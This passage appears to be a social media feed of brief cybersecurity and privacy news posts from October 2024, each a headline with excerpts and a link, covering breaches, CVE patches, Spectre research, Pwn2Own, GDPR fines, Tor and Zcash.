Free has since filed a criminal complaint with the public prosecutor and notified the French National Commission for Information Technology and Civil Liberties (CNIL) and the National Agency for the Security of Information Systems (ANSSI) of the incident.

See more: https://www.bleepingcomputer.com/news/security/free-frances-second-largest-isp-confirms-data-breach-after-leak/

#cybersecurity #security #privacy 
 Google Invests in Alternative Neutral Atom Quantum Technology

Google has privately invested in a firm developing a very different and potentially rival quantum computer technology.

Google, a major figure in quantum computer development using superconducting technology to produce quantum bits (qubits), has invested a multi-million dollar sum into a firm developing an entirely different quantum technology: neutral atoms.

In mid-October 2024 – five years after Google announced it had achieved ‘quantum supremacy’ in 2019 – it invested in the quantum hardware firm QuEra Computing. This was a private investment in a private firm that was founded in 2018. The investment is outside of venture funding, and there are no disclosed details.

See more: https://www.securityweek.com/google-invests-in-alternative-neutral-atom-quantum-technology/

#technology #cybersecurity #google #quantumcomputing 
 Hard-Coded Credentials Vulnerability Found In Kubernetes Image Builder

A critical vulnerability just received a fix with the latest Kubernetes Image Builder release. The vulnerability existed due to hard-coded credentials allowing unauthorized access to an adversary

According to its latest advisory, two security issues received patches with the latest Kubernetes Image Builder. One of these, identified as CVE-2024-9486 (CVSS score of 9.8), existed due to hard-coded credentials enabled during the image-building process. These credentials would remain enabled even with the virtual machines (VMs) built with the Proxmox provider, exposing any nodes using the images to root access from an unauthorized adversary.

In addition, the same Image Builder release also addressed another security flaw, identified as CVE-2024-9594. This medium-severity vulnerability (CVSS 6.3) is the same issue explained above; however, the severity is less for images built with Nutanix, OVA, QEMU, or raw providers. Hence, it’s identified separately and explained here on GitHub.

Users must ensure updating to the Kubernetes Image Builder version 0.1.38 or later to receive all the patches.

See more: https://latesthackingnews.com/2024/10/28/hard-coded-credentials-vulnerability-found-in-kubernetes-image-builder/

#cybersecurity #security #kubernetes 
 New Research Reveals Spectre Vulnerability Persists in Latest AMD and Intel Processors

More than six years after the Spectre security flaw impacting modern CPU processors came to light, new research has found that the latest AMD and Intel processors are still susceptible to speculative execution attacks.

The attack, disclosed by ETH Zürich researchers Johannes Wikner and Kaveh Razavi, aims to undermine the Indirect Branch Predictor Barrier (IBPB) on x86 chips, a crucial mitigation against speculative execution attacks.

Speculative execution refers to a performance optimization feature wherein modern CPUs execute certain instructions out-of-order by predicting the branch a program will take beforehand, thus speeding up the task if the speculatively used value was correct.

"Intel users should make sure their intel-microcode is up to date," the researchers said. "AMD users should make sure to install kernel updates."

See more: https://thehackernews.com/2024/10/new-research-reveals-spectre.html

#cybersecurity #security 
 New tool bypasses Google Chrome’s new cookie encryption system

A researcher has released a tool to bypass Google's new App-Bound encryption cookie-theft defenses and extract saved credentials from the Chrome web browser.

The tool, named 'Chrome-App-Bound-Encryption-Decryption,' was released by cybersecurity researcher Alexander Hagenah after he noticed that others were already figuring out similar bypasses.

Although the tool achieves what multiple infostealer operations have already added to their malware, its public availability raises the risk for Chrome users who continue to store sensitive data in their browsers.
 https://www.bleepingcomputer.com/news/security/new-tool-bypasses-google-chromes-new-cookie-encryption-system/

#cybersecurity #security #privacy 
 Chinese Hackers Use CloudScout Toolset to Steal Session Cookies from Cloud Services

A government entity and a religious organization in Taiwan were the target of a China-linked threat actor known as Evasive Panda that infected them with a previously undocumented post-compromise toolset codenamed CloudScout.

"The CloudScout toolset is capable of retrieving data from various cloud services by leveraging stolen web session cookies," ESET security researcher Anh Ho said. "Through a plugin, CloudScout works seamlessly with MgBot, Evasive Panda's signature malware framework."

The use of the .NET-based malware tool, per the Slovak cybersecurity company, was detected between May 2022 and February 2023. It incorporates 10 different modules, written in C#, out of which three are meant for stealing data from Google Drive, Gmail, and Outlook. The purpose of the remaining modules remains unknown.

See more: https://thehackernews.com/2024/10/chinese-hackers-use-cloudscout-toolset.html

#cybersecurity #security 
 US says Chinese hackers breached multiple telecom providers

The FBI and the U.S. Cybersecurity & Infrastructure Security Agency (CISA) have disclosed that Chinese hackers breached commercial telecommunication service providers in the United States.

The breached entities have been warned, and the agencies are proactively alerting other potential targets of the elevated cyber activity.

"The U.S. Government is investigating the unauthorized access to commercial telecommunications infrastructure by actors affiliated with the People's Republic of China," reads the announcement.

See more: https://www.bleepingcomputer.com/news/security/us-says-chinese-hackers-breached-multiple-telecom-providers/

#cybersecurity #security 
 Researchers Uncover OS Downgrade Vulnerability Targeting Microsoft Windows Kernel

A new attack technique could be used to bypass Microsoft's Driver Signature Enforcement (DSE) on fully patched Windows systems, leading to operating system (OS) downgrade attacks.

"This bypass allows loading unsigned kernel drivers, enabling attackers to deploy custom rootkits that can neutralize security controls, hide processes and network activity, maintain stealth, and much more," SafeBreach researcher Alon Leviev said in a report shared with The Hacker News.

The latest findings build on an earlier analysis that uncovered two privilege escalation flaws in the Windows update process (CVE-2024-21302 and CVE-2024-38202) that could be weaponized to rollback an up-to-date Windows software to an older version containing unpatched security vulnerabilities.

See more:
TheHackerNews: https://thehackernews.com/2024/10/researchers-uncover-os-downgrade.html

SecurityWeek:
https://www.securityweek.com/more-details-shared-on-windows-downgrade-attacks-after-microsoft-rolls-out-mitigations/

#cybersecurity #security 
 https://image.nostr.build/568e1824567a4e9f616be1e0af575dfee2d6bf6e224d23389c2e15b0922038e7.jpg

Happy Birthday Zcash! On this day, 28th October 2016, 8 years ago was generated the genesis block of the Zcash blockchain.

Zcash was the first real-world application of zero-knowledge proofs, a novel method by which one party (the prover) can prove to another (the verifier) that a statement is true, without revealing any information beyond the validity of the statement itself.

#zcash #zk #privacy 
 Several Linux Kernel Driver Maintainers Removed Due To Their Association To Russia.

It was described as due to "compliance requirements" but vague in what those requirements entailed. Linus Torvalds then commented on the Russian Linux maintainers being de-listed and made it clear that they were done due to government compliance requirements / legal issues around Russia. Now today some additional light has been shed on those new Linux kernel "compliance requirements".

Longtime Linux developer and EXT4 file-system maintainer Ted Ts'o has also provided some clarity on a separate Linux kernel mailing list thread. In response to a suggested patch removing Huawei from the MAINTAINERS file given their known relations with the Chinese government there was more discussion about possible future removals.

See original news:
https://www.phoronix.com/news/Russian-Linux-Maintainers-Drop

See Torvalds statement:
https://www.phoronix.com/news/Linus-Torvalds-Russian-Devs

See Compliance Requirements update:
https://www.phoronix.com/news/Linux-Compliance-Requirements

See the original commit:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=6e90b675cf94

#linux #cybersecurity 
 QNAP, Synology, Lexmark devices hacked on Pwn2Own Day 3

The third day of Pwn2Own Ireland 2024 continued to showcase the expertise of white hat hackers as they exposed 11 zero-day vulnerabilities, adding $124,750 to the total prize pool, which now stands at $874,875.

Pwn2Own, a global hacking competition, challenges top security researchers to exploit a range of software and hardware devices, with the ultimate goal of earning the prestigious "Master of Pwn" title and claiming up to $1 million in rewards.

On Day 1, participants uncovered 52 zero-day vulnerabilities, and on Day 2, another 51 zero-days were added.

Yesterday, the competition saw impressive performances from teams representing Viettel Cyber Security, DEVCORE, and PHP Hooligans/Midnight Blue, among others.

See more: https://www.bleepingcomputer.com/news/security/qnap-synology-lexmark-devices-hacked-on-pwn2own-day-3/

#cybersecurity #security 
 Irish Watchdog Imposes Record €310 Million Fine on LinkedIn for GDPR Violations

The Irish data protection watchdog on Thursday fined LinkedIn €310 million ($335 million) for violating the privacy of its users by conducting behavioral analyses of personal data for targeted advertising.

"The inquiry examined LinkedIn's processing of personal data for the purposes of behavioral analysis and targeted advertising of users who have created LinkedIn profiles (members)," the Data Protection Commission (DPC) said. "The decision [...] concerns the lawfulness, fairness and transparency of this processing."

See more: https://thehackernews.com/2024/10/irish-watchdog-imposes-record-310.html

#cybersecurity #security #privacy 
 Insurance admin Landmark says data breach impacts 800,000 people

Insurance administrative services company Landmark Admin warns that a data breach impacts over 800,000 people from a May cyberattack

Due to the sensitive nature of the stolen data, impacted people should monitor their credit reports and bank accounts for suspicious activity.

See more: https://www.bleepingcomputer.com/news/security/insurance-admin-landmark-says-data-breach-impacts-800-000-people/

#cybersecurity #security #privacy 
 UnitedHealth says data of 100 million stolen in Change Healthcare breach

UnitedHealth has confirmed for the first time that over 100 million people had their personal information and healthcare data stolen in the Change Healthcare ransomware attack, marking this as the largest healthcare data breach in recent years.

This data breach was caused by a February ransomware attack on UnitedHealth subsidiary Change Healthcare, which led to widespread outages in the U.S. healthcare system.

During the attack, the threat actors stole 6 TB of data and ultimately encrypted computers on the network, causing the company to shut down IT systems to prevent the spread of the attack.

See more: https://www.bleepingcomputer.com/news/security/unitedhealth-says-data-of-100-million-stolen-in-change-healthcare-breach/

#cybersecurity #security #privacy 
 Cisco fixes VPN DoS flaw discovered in password spray attacks

Cisco fixed a denial of service flaw in its Cisco ASA and Firepower Threat Defense (FTD) software, which was discovered during large-scale brute force attacks against Cisco VPN devices in April.

The flaw is tracked as CVE-2024-20481 and impacts all versions of Cisco ASA and Cisco FTD up until the latest versions of the software.

"A vulnerability in the Remote Access VPN (RAVPN) service of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) of the RAVPN service," reads the CVE-2024-20481 security advisory.

See more: https://www.bleepingcomputer.com/news/security/cisco-fixes-vpn-dos-flaw-discovered-in-password-spray-attacks/

#cybersecurity #security 
 IBM Boosts Guardium Platform to Address Shadow AI, Quantum Cryptography

IBM is updating and upgrading its Guardium platform to provide security for the two primary new technology problems: AI models and quantum safety. 

IBM Guardium AI Security and IBM Guardium Quantum Safe combine to form the newly launched IBM Guardium Data Security Center, which operates across the entire enterprise hybrid infrastructure

See more: https://www.securityweek.com/ibm-boosts-guardium-platform-to-address-shadow-ai-quantum-cryptography/

#cybersecurity 
 CISA Warns of Active Exploitation of Microsoft SharePoint Vulnerability (CVE-2024-38094)

A high-severity flaw impacting Microsoft SharePoint has been added to the Known Exploited Vulnerabilities (KEV) catalog by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday, citing evidence of active exploitation.

The vulnerability, tracked as CVE-2024-38094 (CVSS score: 7.2), has been described as a deserialization vulnerability impacting SharePoint that could result in remote code execution.

"An authenticated attacker with Site Owner permissions can use the vulnerability to inject arbitrary code and execute this code in the context of SharePoint Server," Microsoft said in an alert for the flaw.

See more: https://thehackernews.com/2024/10/cisa-warns-of-active-exploitation-of.html

#cybersecurity #security 
 WhatsApp now encrypts contact databases for privacy-preserving synching

The WhatsApp messenger platform has introduced Identity Proof Linked Storage (IPLS), a new privacy-preserving encrypted storage system designed for contact management.

The new system solves two long-standing problems WhatsApp users have been dealing with for years, namely the risk of losing their contact lists if they lose their phone and the inability to sync contacts between different devices.

With IPLS, WhatsApp contact lists will now bind to the account rather than the device, allowing users to easily manage them between device changes or replacements.

See more: https://www.bleepingcomputer.com/news/security/whatsapp-now-encrypts-contact-databases-for-privacy-preserving-synching/

#cybersecurity #security 
 Lazarus hackers used fake DeFi game to exploit Google Chrome zero-day

The North Korean Lazarus hacking group exploited a Google Chrome zero-day tracked as CVE-2024-4947 through a fake decentralized finance (DeFi) game targeting individuals in the cryptocurrency space.

Kaspersky discovered the attacks on May 13, 2024, and reported the Chrome zero-day flaw to Google.

Google issued a fix for CVE-2024-4947 on May 25, with Chrome version 125.0.6422.60/.61.

See more: https://www.bleepingcomputer.com/news/security/lazarus-hackers-used-fake-defi-game-to-exploit-google-chrome-zero-day/

#cybersecurity #security 
 Tor 14.0 browser is out! It’s based on Firefox ESR 128, with enhanced privacy protections and bug fixes.

This is the first stable release based on Firefox ESR 128, incorporating a year's worth of changes shipped upstream in Firefox. 

Android adds desktop feature "New circuit for this site", allowing mobile users to request a new circuit, to refresh the connection, in a more targeted fashion.

Extended support for legacy platforms: Windows 7, 8 and 8.1 and macOS 10.12, 10.13 and 10.14  will continue to receive critical security updates updates on a temporary basis until at least March 2025!

See more:
https://blog.torproject.org/new-release-tor-browser-140/

Twitter post:
https://x.com/torproject/status/1848835179294691396

#privacy #tor #security 
 Critical Vulnerabilities Expose mbNET.mini, Helmholz Industrial Routers to Attacks

Germany’s CERT@VDE has alerted organizations to several critical and high-severity vulnerabilities discovered recently in industrial routers. Impacted vendors have released patches for their products. 

See more: https://www.securityweek.com/critical-vulnerabilities-expose-mbnet-mini-helmholz-industrial-routers-to-attacks/

#cybersecurity #security 
 VMware fixes bad patch for critical vCenter Server RCE flaw

VMware has released another security update for CVE-2024-38812, a critical VMware vCenter Server remote code execution vulnerability that was not correctly fixed in the first patch from September 2024.

The flaw is rated critical (CVSS v3.1 score: 9.8) and stems from a heap overflow weakness in vCenter's DCE/RPC protocol implementation, impacting the vCenter Server and any products incorporating it, such as vSphere and Cloud Foundation.

The flaw does not require user interaction for exploitation, as remote code execution is triggered when a specially crafted network packet is received.

See more: https://www.bleepingcomputer.com/news/security/vmware-fixes-bad-patch-for-critical-vcenter-server-rce-flaw/

#cybersecurity #security 
 Google Warns of Samsung Zero-Day Exploited in the Wild

A zero-day vulnerability in Samsung’s mobile processors has been leveraged as part of an exploit chain for arbitrary code execution, Google’s Threat Analysis Group (TAG) warns.

Tracked as CVE-2024-44068 (CVSS score of 8.1) and patched as part of Samsung’s October 2024 set of security fixes, the issue is described as a use-after-free bug that could be abused to escalate privileges on a vulnerable Android device.

“An issue was discovered in the m2m scaler driver in Samsung Mobile Processor and Wearable Processor Exynos 9820, 9825, 980, 990, 850, and W920. A use-after-free in the mobile processor leads to privilege escalation,” a NIST advisory reads.

See more: https://www.securityweek.com/google-warns-of-samsung-zero-day-exploited-in-the-wild/

#cybersecurity #security 
 Atlassian Patches Vulnerabilities in Bitbucket, Confluence, Jira

Atlassian has announced security updates that resolve six high-severity vulnerabilities in Bitbucket, Confluence, and Jira Service Management products.

See more: https://www.securityweek.com/atlassian-patches-vulnerabilities-in-bitbucket-confluence-jira/

#cybersecurity #security 
 Roundcube Webmail Vulnerability Exploited in Government Attack

A threat actor was caught attempting to exploit a recent vulnerability in Roundcube Webmail against a governmental organization in a Commonwealth of Independent States (CIS) country, cybersecurity firm Positive Technologies reports.

Tracked as CVE-2024-37383 and described as a cross-site scripting (XSS) issue affecting the way Roundcube was handling SVG animate attributes, the bug was patched on May 19 in Roundcube Webmail versions 1.5.7 and 1.6.7.

See more: https://www.securityweek.com/roundcube-webmail-vulnerability-exploited-in-government-attack/

#cybersecurity #security 
 Internet Archive breached again through stolen access tokens

The Internet Archive was breached again, this time on their Zendesk email support platform after repeated warnings that threat actors stole exposed GitLab authentication tokens.

"Whether you were trying to ask a general question, or requesting the removal of your site from the Wayback Machine your data is now in the hands of some random guy. If not me, it'd be someone else."

BleepingComputer attempted contact the Internet Archive numerous times, as recently as on Friday, offering to share what they knew about how the breach occurred and why it was done, but we never received a response.

See more: https://www.bleepingcomputer.com/news/security/internet-archive-breached-again-through-stolen-access-tokens/

#cybersecurity #security 
 Cisco takes DevHub portal offline after hacker publishes stolen data

Cisco confirmed today that it took its public DevHub portal offline after a threat actor leaked "non-public" data, but it continues to state that there is no evidence that its systems were breached.

This statement comes after a threat actor known as IntelBroker claimed to have breached Cisco and attempted to sell data and source code stolen from the company.

Screenshots and files, provided to BleepingComputer, showed that the threat actor had access to most, if not all, of the data stored on this portal. This data included source code, configuration files with database credentials, technical documentation, and SQL files.

See more: https://www.bleepingcomputer.com/news/security/cisco-takes-devhub-portal-offline-after-hacker-publishes-stolen-data/

#cybersecurity #security 
 Internet Archive and Wayback Machine Resurrect After DDoS Wave

Most of Internet Archive’s services have resumed after a series of distributed denial-of-service (DDoS) attacks took the world’s largest digital library’s website offline several times over the past few days.

In a blog post published on October 18, the non-profit confirmed that many services are now up and running, including its Wayback Machine, Archive-It, scanning and national library crawls, email, blog, helpdesk and social media communications.

See more: https://www.infosecurity-magazine.com/news/internet-archive-wayback-machine/

#hacking 
 Intel, AMD CPUs on Linux impacted by newly disclosed Spectre bypass

The latest generations of Intel processors, including Xeon chips, and AMD's older microarchitectures on Linux are vulnerable to new speculative execution attacks that bypass existing ‘Spectre’ mitigations.

The vulnerabilities impact Intel's 12th, 13th, and 14th chip generations for consumers and the 5th and 6th generation of Xeon processors for servers, along with AMD's Zen 1, Zen 1+, and Zen 2 processors.

See more: https://www.bleepingcomputer.com/news/security/intel-amd-cpus-on-linux-impacted-by-newly-disclosed-spectre-bypass/

#cybersecurity #security 
 Undercover North Korean IT workers now steal data, extort employers

North Korean IT professionals who trick Western companies into hiring them are stealing data from the organization's network and asking for a ransom to not leak it.

They avoided video during calls or resorted to various tricks while on the job to hide their face during video conferences, such as using artificial intelligence tools.

Dispatching IT workers to seek employment at companies in wealthier nations is a tactic that North Korea has been using for years as a means to obtain privileged access for cyberattacks or to generate revenue for the country's weapons programs.

See more: https://www.bleepingcomputer.com/news/security/undercover-north-korean-it-workers-now-steal-data-extort-employers/

#cybersecurity #security 
 Microsoft Reveals macOS Vulnerability that Bypasses Privacy Controls in Safari Browser

Microsoft has disclosed details about a now-patched security flaw in Apple's Transparency, Consent, and Control (TCC) framework in macOS that has likely come under exploitation to get around a user's privacy preferences and access data.

The shortcoming, codenamed HM Surf by the tech giant, is tracked as CVE-2024-44133. It was addressed by Apple as part of macOS Sequoia 15 by removing the vulnerable code.

See more:
https://thehackernews.com/2024/10/microsoft-reveals-macos-vulnerability.html

#cybersecurity #security 
 Google: 70% of exploited flaws disclosed in 2023 were zero-days

Google Mandiant security analysts warn of a worrying new trend of threat actors demonstrating a better capability to discover and exploit zero-day vulnerabilities in software.

Specifically, of the 138 vulnerabilities disclosed as actively exploited in 2023, Mandiant says 97 (70.3%) were leveraged as zero-days.

See more: https://www.bleepingcomputer.com/news/security/google-70-percent-of-exploited-flaws-disclosed-in-2023-were-zero-days/

#cybersecurity #security 
 VMware Patches High-Severity SQL Injection Flaw in HCX Platform

VMWare on Wednesday called urgent attention to a critical remote code execution flaw haunting users of its enterprise-facing HCX application mobility platform.

The vulnerability, tagged as CVE-2024-38814, carries a CVSS severity score of 8.8/10 and allows attackers with non-administrator privileges to execute remote code on the HCX manager.

The security defect impacts multiple versions of the VMware HCX platform, including versions 4.8.x, 4.9.x, and 4.10.x. 

See more: https://www.securityweek.com/vmware-patches-high-severity-sql-injection-flaw-in-hcx-platform/

#cybersecurity #security 
 Understand these seven password attacks and how to stop them:

1. Brute-force attacks
2. Dictionary attacks
3. Password spraying
4. Credential stuffing
5. Phishing
6. Keylogger attack
7. Social engineering

See more: https://www.bleepingcomputer.com/news/security/understand-these-seven-password-attacks-and-how-to-stop-them/

#cybersecurity #security 
 Oracle Patches Over 200 Vulnerabilities With October 2024 CPU

Oracle on Tuesday announced 334 new security patches as part of its October 2024 Critical Patch Update (CPU), including 186 fixes for vulnerabilities that can be exploited remotely without authentication.

SecurityWeek has identified roughly 220 unique CVEs in Oracle’s October 2024 CPU. Approximately three dozen security patches resolve critical-severity flaws.

See more: https://www.securityweek.com/oracle-patches-over-200-vulnerabilities-with-october-2024-cpu/

#cybersecurity #security 
 Experts Play Down Significance of Chinese Quantum “Hack”

Security experts have urged caution after a stream of doom-laden reports in recent days claimed Chinese researchers have cracked military-grade encryption using quantum computing technology.

“While the research shows quantum computing's potential threat to classical encryption, the attack was executed on a 22-bit key – far shorter than the 2048 or 4096-bit keys commonly used in practice today. The suggestion that this poses an imminent risk to widely used encryption standards is misleading,” DigiCert head of R&D Avesta Hojjati argued.

“This research, while intriguing, does not equate to an immediate quantum apocalypse.”

See more: https://www.infosecurity-magazine.com/news/experts-play-down-chinese-quantum/

#cybersecurity #security 
 How does #zcash work? Understanding zerocash and zcash from Zellic.

See more:
https://www.zellic.io/blog/how-does-zcash-work/ 
 LunarDao - DarkFiSquad is rising funds to support anon developers who research & build anonymity tech.

See more:
https://lunardao.net/darkfi_raise_guide_updated.html

Twitter post:
https://x.com/lunarpunksquad/status/1846192056982532588

#privacy 
 TrickMo Banking Trojan Can Now Capture Android PINs and Unlock Patterns

"This new addition enables the threat actor to operate on the device even while it is locked," Zimperium security researcher Aazim Yaswant said in an analysis published last week.

Some of the new variants of the malware have also been equipped to harvest the device's unlock pattern or PIN by presenting to the victim a deceptive User Interface (UI) - a full screenn HTML page, that mimics the device's actual unlock screen. It collects and   sends users unlock pattern/PIN, alongside a unique device identifier to an attacker-controlled server.

See more: https://thehackernews.com/2024/10/trickmo-banking-trojan-can-now-capture.html

#cybersecurity #security 
 GitHub Patches Critical Vulnerability in Enterprise Server

Code hosting platform GitHub has released patches for a critical-severity vulnerability in GitHub Enterprise Server that could lead to unauthorized access to affected instances.

Tracked as CVE-2024-9487 (CVSS score of 9.5), the bug was introduced in May 2024 as part of the remediations released for CVE-2024-4985, a critical authentication bypass defect allowing attackers to forge SAML responses and gain administrative access to the Enterprise Server.

The vulnerability was resolved in GitHub Enterprise Server versions 3.11.16, 3.12.10, 3.13.5, and 3.14.2, which also address a medium-severity information disclosure bug that could be exploited through malicious SVG files.

See more: https://www.securityweek.com/github-patches-critical-vulnerability-in-enterprise-server/

#cybersecurity #security 
 New FIDO proposal lets you securely move passkeys across platforms

The Fast IDentity Online (FIDO) Alliance has published a working draft of a new specification that aims to enable the secure transfer of passkeys between different providers.

Passkeys are a method of authentication without a password that leverages public-key cryptography to authenticate users without requiring them to remember or manage long strings of characters.

The new specification that FIDO proposes essentially addresses the lack of widely accepted secure standards for credential transfer, eliminating the complications or practical limitations when switching between providers.

The drafts were developed with the contribution of specialists from FIDO associate members and stakeholders like Dashlane, Bitwarden, 1Password, NordPass, and Google.

See more: https://www.bleepingcomputer.com/news/security/new-fido-proposal-lets-you-securely-move-passkeys-across-platforms/

#cybersecurity #security 
 Free TornadoCash or Samurai wallet devs! 

nostr:nevent1qqs25t60qr8j0uxr36rwzwtnmq82xzlj42jcxatghs3u0rjuzpw6klgppemhxue69uhkummn9ekx7mp0qgsd3fhv7rped64g77dyf9l7ndmae9mkxdz37099cc6wyzr9jytxg7crqsqqqqqp8nf3k7 
 Microsoft deprecates PPTP and L2TP VPN protocols in Windows Server 

Microsoft has officially deprecated the Point-to-Point Tunneling Protocol (PPTP) and Layer 2 Tunneling Protocol (L2TP) in future versions of Windows Server, recommending admins switch to different protocols that offer increased security.

PPTP is vulnerable to offline brute force attacks of captured authentication hashes, and L2TP provides no encryption unless coupled with another protocol, like IPsec. However, if L2TP/IPsec is not configured correctly, it can introduce weaknesses that make it susceptible to attacks.

"The move is part of Microsoft's strategy to enhance security and performance by transitioning users to more robust protocols like Secure Socket Tunneling Protocol (SSTP) and Internet Key Exchange version 2 (IKEv2)," Microsoft announced in a post this week.

See more:
https://www.bleepingcomputer.com/news/microsoft/microsoft-deprecates-pptp-and-l2tp-vpn-protocols-in-windows-server/

#cybersecurity #privacy #security
 
 Pokémon Developer Game Freak Suffers Data Breach 

Game Freak, the company behind the Pokémon franchise, is dealing with a security breach that has compromised the data of more than 2,600 employees and partners. 

The data leak first came to light on a forum known as 4chan earlier this month before it began circulating on social media and other online forums.

The data allegedly includes inside information of video games, source code for existing frames, and data on unreleased Pokémon games.

See more:
https://www.infosecurity-magazine.com/news/pokemon-developer-game-freak-data
 https://www.darkreading.com/cyberattacks-data-breaches/insider-info-pokemon-allegedly-leaked-gaming-hack

#security #cybersecurity #privacy 
 Google warns uBlock Origin and other extensions may be disabled soon

The warning includes a link to a Google support bulletin that states the browser extension may be disabled to protect users' privacy and security.

"To better protect your privacy and security, Chrome and the Chrome Web Store require extensions to be up-to-date with new requirements," reads Google's support bulletin.

"uBO is a Manifest v2 extension, hence the warning in your Google Chrome browser. There is no Manifest v3 version of uBO, hence the browser will suggest alternative extensions as a replacement for uBO,"

See more: https://www.bleepingcomputer.com/news/google/google-warns-ublock-origin-and-other-extensions-may-be-disabled-soon/

#security #cybersecurity #privacy